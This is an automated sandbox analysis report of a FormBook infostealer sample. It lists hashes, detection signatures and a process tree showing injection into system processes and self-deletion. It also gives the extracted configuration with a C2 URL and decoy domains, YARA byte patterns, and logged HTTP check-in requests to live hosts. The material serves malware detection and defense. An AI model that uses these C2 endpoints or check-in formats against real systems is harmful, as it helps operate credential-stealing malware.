Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 5t2CmTUhKc.exe

Overview

General Information

Sample Name:5t2CmTUhKc.exe
Analysis ID:433074
MD5:116e736ba00fca4b8499c4df00796454
SHA1:a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
SHA256:096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5t2CmTUhKc.exe (PID: 6368 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
    • 5t2CmTUhKc.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: 116E736BA00FCA4B8499C4DF00796454)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • help.exe (PID: 7136 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
        • cmd.exe (PID: 5696 cmdline: /c del 'C:\Users\user\Desktop\5t2CmTUhKc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.5t2CmTUhKc.exe.2290000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.5t2CmTUhKc.exe.2290000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.5t2CmTUhKc.exe.2290000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        2.2.5t2CmTUhKc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.5t2CmTUhKc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFdAvira URL Cloud: Label: malware
          Source: http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFdAvira URL Cloud: Label: phishing
          Source: https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/VzAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 5t2CmTUhKc.exeVirustotal: Detection: 28%Perma Link
          Source: 5t2CmTUhKc.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.416256071.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597396860.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.416309209.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597782419.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.415990324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.597893599.0000000000780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342749345.0000000002290000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.338823641.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5t2CmTUhKc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.5t2CmTUhKc.exe.2290000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 5t2CmTUhKc.exeJoe Sandbox ML: detected
          Source: 0.2.5t2CmTUhKc.exe.2290000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.5t2CmTUhKc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.help.exe.4ed3f8.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 11.2.help.exe.35c7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.5t2CmTUhKc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5t2CmTUhKc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5t2CmTUhKc.exe, 00000000.00000003.333908194.00000000099B0000.00000004.00000001.sdmp, 5t2CmTUhKc.exe, 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.598457171.0000000000C2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 5t2CmTUhKc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: 5t2CmTUhKc.exe, 00000002.00000002.416428242.0000000000AA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.369588709.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop esi2_2_00415851
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop ebx2_2_00406A98
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop esi2_1_00415851
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 4x nop then pop ebx2_1_00406A98
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop esi11_2_00415851
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx11_2_00406A99

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 185.224.138.83:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.oceancollaborative.com/bp3i/
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.thechandeck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1Host: www.bancambios.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1Host: www.middreampostal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.xn---yado-8e4dze0c.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: CYBERCONUS CYBERCONUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.thechandeck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw== HTTP/1.1Host: www.bancambios.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.purpleqube.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ== HTTP/1.1Host: www.middreampostal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd HTTP/1.1Host: www.xn---yado-8e4dze0c.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd785YA8v1+XbYT2uw== HTTP/1.1Host: www.oceancollaborative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.bluebeltpanobuy.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/htmlLast-Modified: Tue, 25 Jun 2019 07:07:25 GMTEtag: "999-5d11c82d-331806d17fbda5d0;;;"Accept-Ranges: bytesContent-Length: 2457Date: Fri, 11 Jun 2021 06:55:14 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: help.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpString found in binary or memory: http://dfltweb1.onamae.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 5t2CmTUhKc.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 5t2CmTUhKc.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
